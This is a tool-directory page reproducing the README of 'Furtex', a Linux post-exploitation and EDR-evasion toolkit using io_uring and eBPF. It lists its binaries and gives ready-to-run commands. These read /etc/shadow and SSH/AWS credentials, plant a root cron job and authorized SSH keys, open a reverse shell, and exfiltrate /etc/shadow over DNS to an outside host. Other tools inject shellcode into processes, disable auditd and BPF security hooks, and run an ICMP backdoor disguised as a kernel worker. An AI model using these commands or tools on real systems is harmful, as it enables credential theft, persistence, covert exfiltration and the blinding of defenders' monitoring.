Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Furtex — Post-exploitation and evasion research toolkit for Linux. | Kitploit
Tools/GitHubGitHub/matheuzsecurity/furtex
Privilege EscalationExploitationPost-ExploitationMalware AnalysisPenetration TestingCommand and ControlBinary AnalysisRed TeamingPayload Development
GitHubmatheuzsecurity/furtex

Furtex

Post-exploitation and evasion research toolkit for Linux.

26130122 months agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository

Furtex

Post-exploitation and evasion research toolkit for Linux, built around io_uring and eBPF. No liburing, no frameworks, raw syscalls throughout.

More tools soon. PRs are welcome. 🇧🇷

Join in Rootkit Researchers

  • https://discord.gg/66N5ZQppU7

For authorized research and red team engagements only. Don't run this on systems you don't own.

Furtex/
├── io_uring/     raw io_uring ops: file, net, injection, exfil (13 tools)
├── bpf/          BPF map and program tooling (15 tools)
├── ebpf/         BPF-side programs and loaders (9 programs + 2 runners)
├── edrs/         EDR evasion and post-exploitation (75 tools)
└── techniques/   Falco-specific bypass, all 25 default rules (13 tools)

Requirements

Toolchain

toolneeded for
gccall userspace binaries
clangebpf/*.bpf.c BPF-side programs
makebuild system

Headers and libraries

packageneeded for
linux-headers-$(uname -r)<linux/bpf.h>, <linux/io_uring.h> and related kernel headers
libbpf-dev<bpf/bpf_helpers.h> and friends used in ebpf/ programs
bpftoolgenerate vmlinux.h via make vmlinux inside ebpf/

On Debian/Kali/Ubuntu:

sudo apt install gcc clang make linux-headers-$(uname -r) libbpf-dev bpftool

Kernel versions

minimumwhat it unlocks
5.4io_uring base (IORING_FEAT_SINGLE_MMAP, BPF map iteration)
5.6IORING_OP_OPENAT, IORING_OP_STATX, pidfd_getfd (pidfd_steal)
5.8CAP_BPF + CAP_PERFMON split (replaces CAP_SYS_ADMIN for BPF)
5.9BPF_LINK_DETACH (bpf_link_detach)
5.19IORING_OP_SOCKET (af_packet_send, dns_exfil, xdp_socket_send, bpf_kprobe_bypass)

Capabilities

capabilitytools that require it
CAP_BPF (or CAP_SYS_ADMIN pre-5.8)all bpf/ tools, ebpf/ loaders
CAP_PERFMONebpf/ tracepoint and kprobe programs
CAP_NET_RAWicmp_tunnel, af_packet_shell, skf_c2_runner, icmp_trigger
CAP_NET_ADMINxdp_socket_send, netfilter_flush
CAP_AUDIT_CONTROLaudit_kill

BTF must be enabled in the kernel (CONFIG_DEBUG_INFO_BTF=y) to run make vmlinux for ebpf/ programs.

On distros with older libc-dev headers (Ubuntu 22.04 etc.) you may need #ifndef IORING_OP_SOCKET / #define IORING_OP_SOCKET 45. Already handled in this repo.

Build

commandbuilds
make alleverything
make uringio_uring/ only
make bpfbpf/ userspace tools
make ebpfBPF-side programs (needs clang + libbpf)
make edrsall edrs/ binaries
make techniquesFalco bypass tools
make cleanremove all binaries

edrs/ has its own sub-Makefile with ~75 binaries split by privilege:

cd edrs && make priv    # root / CAP_* required
cd edrs && make unpriv  # no privileges needed

See PRIVILEGES.md for the full breakdown.

io_uring bypass coverage

io_uring SQEs go through the kernel workqueue. io_uring_enter(2) never calls through sys_call_table, never fires sys_enter_* tracepoints, and never hits livepatch on native_sys_call. That alone kills a large class of EDR hooks without touching anything.

What io_uring bypasses on its own:

hook pointnote
sys_call_table pointer replacementio_uring never goes through the syscall table
livepatch on native_sys_call / compat_sys_callsame reason
sys_enter_* tracepointsworkqueue path, no tracepoint fires

What io_uring does NOT bypass on its own (needs an active tool):

hook pointtoolwhat the tool does
kprobes on vfs_read, security_file_open, etc.ftrace_enumremoves the kprobe hooks
BPF LSM / KRSIbpf_link_detachdetaches the BPF link
Linux auditaudit_killdisables auditd via NETLINK_AUDIT
LD_PRELOAD / PLT-GOT patchesplt_unhookremoves the userland hooks
netfilter OUTPUT / conntrackaf_packet_shelluses AF_PACKET at layer 2, skips netfilter
inet_stream_connect hooksudp_shelluses UDP, never calls tcp connect path

io_uring/

iouring_utils.h handles ring setup without liburing.

binarywhat it does
file_readOPENAT+READ+CLOSE chain via io_uring, no sys_enter_read event
file_writeOPENAT+WRITE+CLOSE chain
file_appendsame as file_write but O_APPEND, offset -1
net_connectSOCKET+CONNECT+SEND+RECV in one ring
net_reverse_shellreverse shell over io_uring CONNECT
multifile_readup to 64 files in one SQE batch
memfd_execstream ELF via stdin into memfd, execve via /proc/self/fd
proc_injectJIT injection via /proc/PID/mem; ptrace injection (--ptrace flag)
pipe_spliceSPLICE kernel-to-kernel, userspace hooks never see bytes
inotify_bypass_watchio_uring READ does not raise IN_ACCESS/IN_OPEN
dns_exfilhex-encode data as DNS query labels over io_uring SENDMSG
af_packet_sendraw Ethernet via AF_PACKET (IORING_OP_SOCKET, bypasses inet path)
xdp_socket_sendraw frame via AF_XDP + UMEM ring, bypasses netfilter entirely
./io_uring/file_read /etc/shadow
./io_uring/file_write /etc/cron.d/x "* * * * * root /tmp/sh"
./io_uring/file_append /root/.ssh/authorized_keys "ssh-ed25519 AAAA..."
./io_uring/net_connect 10.0.0.1 4444 "ping"
./io_uring/net_reverse_shell 192.168.1.1 4444
./io_uring/multifile_read /etc/passwd /etc/shadow /root/.ssh/id_rsa ~/.aws/credentials
cat payload | ./io_uring/memfd_exec [args...]
./io_uring/pipe_splice /etc/shadow /tmp/out
./io_uring/inotify_bypass_watch /var/log/auth.log
./io_uring/dns_exfil 1.2.3.4 exfil.example.com /etc/shadow

sudo ./io_uring/proc_inject
sudo ./io_uring/proc_inject <pid>
sudo ./io_uring/proc_inject          <pid> <shellcode_hex>
sudo ./io_uring/proc_inject --ptrace <pid> <shellcode_hex>

sudo ./io_uring/af_packet_send eth0 08:00:27:aa:bb:cc ff:ff:ff:ff:ff:ff "payload"
sudo ./io_uring/xdp_socket_send eth0 <hex-frame>

bpf/

Most tools require CAP_BPF. env_exfil works unprivileged. icmp_trigger requires CAP_NET_RAW instead of CAP_BPF.

binarywhat it does
map_reconlist all loaded BPF maps
map_dumperdump map contents by ID
map_writeupdate map entries by ID
map_poisonzero Falco's interesting_sys entries around a payload
prog_reconlist BPF programs: type, name, map count
pid_allowlistinsert PID into an EDR allowlist map
edr_finscore loaded BPF maps/programs against known EDR heuristics
lsm_checkdetect active BPF LSM hooks and test if map writes are blocked
bpf_persistpin/retrieve/unpin maps and programs on bpffs
map_snapshotsave and restore map contents to a binary file
env_exfilread /proc/*/environ for secrets
bpf_link_detachenumerate and detach BPF links (removes LSM hooks)
link_updateredirect a BPF link to a no-op program (hook stays visible, fires nothing)
map_freezefreeze a BPF map read-only via BPF_MAP_FREEZE (writes return -EPERM)
icmp_triggerICMP magic-packet backdoor; spawns reverse shell via socketpair relay; masquerades as kworker/u4:2
Download Tool